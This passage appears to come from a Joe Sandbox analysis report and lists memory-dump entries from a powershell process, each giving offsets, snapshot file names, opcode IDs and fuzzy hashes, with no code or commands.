                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9675930f3e2a65a675b787634b0ad6391b60890d6389dd6faa6a4c35d58d791b
                                                                                                                                                    • Instruction ID: 2f8d32f69a83dc8bb51c42ab2b660ced574c3e443d4a4cd130c58e15f4db01d7
                                                                                                                                                    • Opcode Fuzzy Hash: 9675930f3e2a65a675b787634b0ad6391b60890d6389dd6faa6a4c35d58d791b
                                                                                                                                                    • Instruction Fuzzy Hash: B0212AB4A14215DFCB00CF59C980AAEFBB1FF48310B148596E519EB761C735EC41CBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33cb545b9c4d1ff2d0b5f5c1dec803bea8d34e56bef936cf2abe456cc501a451
                                                                                                                                                    • Instruction ID: 810613c07345694f2457c7be9e51666546946420c49303572657b7ed469d825c
                                                                                                                                                    • Opcode Fuzzy Hash: 33cb545b9c4d1ff2d0b5f5c1dec803bea8d34e56bef936cf2abe456cc501a451
                                                                                                                                                    • Instruction Fuzzy Hash: 9D21E774A00615DFCB00DF99C984AAEFBB5FF48310B258599D919EB365C731EC41CBA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5e7fa89360fd5ded581cb210d25d0430a699832a90ad04e246aefbe1f82ac873
                                                                                                                                                    • Instruction ID: 2ac15120f0317a893ae9a5370ff93e355435e7fa644f67a831c2cc38cfa107c7
                                                                                                                                                    • Opcode Fuzzy Hash: 5e7fa89360fd5ded581cb210d25d0430a699832a90ad04e246aefbe1f82ac873
                                                                                                                                                    • Instruction Fuzzy Hash: CB210874A0465A9FCB00DF98D4909AEBBB5FF89310B148599D859AB352C331ED41CBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2071663958.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_35ad000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8ba0e147a55b122ce2edd347dc2ebf1db96b5d3e6258cc2e6112a677577fcec3
                                                                                                                                                    • Instruction ID: 67fb201555d49ee135e861b8f0c522935ad5182fd83a9fb27400fd80e634343c
                                                                                                                                                    • Opcode Fuzzy Hash: 8ba0e147a55b122ce2edd347dc2ebf1db96b5d3e6258cc2e6112a677577fcec3
                                                                                                                                                    • Instruction Fuzzy Hash: 2E01F771008B409AE710DA2ED98476BFFE8FF41724F0CC869ED484A556D2799845E6B1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2071663958.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_35ad000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aa328997656b8f7eb5e20b1e4e53e3354c2afa452c53ff0974f3854edff04271
                                                                                                                                                    • Instruction ID: f6003cf260dfbc14e52f4ebb9345f99eb8677d451a91321576b174908f03a351
                                                                                                                                                    • Opcode Fuzzy Hash: aa328997656b8f7eb5e20b1e4e53e3354c2afa452c53ff0974f3854edff04271
                                                                                                                                                    • Instruction Fuzzy Hash: EB01807200E7C09ED7128B25C894B56BFB4EF43224F1DC0CBD8888F5A3C2699849D772
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-1608119003
                                                                                                                                                    • Opcode ID: ac853d62b59acacb50ed1a30761416316fd5e7243d0013664d45bb94c26a09df
                                                                                                                                                    • Instruction ID: 76f984c738dfafbbde95fbf0a92dd5119537a94195ce44882550a37b650e91be
                                                                                                                                                    • Opcode Fuzzy Hash: ac853d62b59acacb50ed1a30761416316fd5e7243d0013664d45bb94c26a09df
                                                                                                                                                    • Instruction Fuzzy Hash: A0A159B27043568FD7248B7994107ABBBF6EFC2220F1484ABD456CB361DA32CC45C7A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                    • Opcode ID: 9900230478d0d58fbf1571ed290c4f7a82442f1d9ea2572227c151dcada56a09
                                                                                                                                                    • Instruction ID: e5996370b2f311a343eea8defb6c5bf21f8afc5c2fe5297fcbd5140fa1d9704d
                                                                                                                                                    • Opcode Fuzzy Hash: 9900230478d0d58fbf1571ed290c4f7a82442f1d9ea2572227c151dcada56a09
                                                                                                                                                    • Instruction Fuzzy Hash: 955127B1B0430E8FCB255BADD810766BBF6AFC2611F19846BD427CB251DA35CC85C7A2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                    • Opcode ID: 03dce0521a0a2dabe816c0d168d8aea95bffcda6c8ec716b57f6851fdd9ca16b
                                                                                                                                                    • Instruction ID: 96d36fb21b0c42af2d7b9d384b3854dbad24349a9d2ed44213445344093ba088
                                                                                                                                                    • Opcode Fuzzy Hash: 03dce0521a0a2dabe816c0d168d8aea95bffcda6c8ec716b57f6851fdd9ca16b
                                                                                                                                                    • Instruction Fuzzy Hash: 552127B1710306EFDF245A6E9C00B27BBEA5BC0714F24842AE51ACB385DD76DC448362
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-2049395529
                                                                                                                                                    • Opcode ID: e94542fb58507b3082108b19536b8dd59b8b0c27ba89ce06c3517dfc161c0609
                                                                                                                                                    • Instruction ID: 09c7f786cf22ce89caad6e606c3ada38c263d125b144c090a4d3c597433124d7
                                                                                                                                                    • Opcode Fuzzy Hash: e94542fb58507b3082108b19536b8dd59b8b0c27ba89ce06c3517dfc161c0609
                                                                                                                                                    • Instruction Fuzzy Hash: B7017DA17043490FD72A0628182029B6FF76FD2950B15419BC893DF357CC15CC4A43E7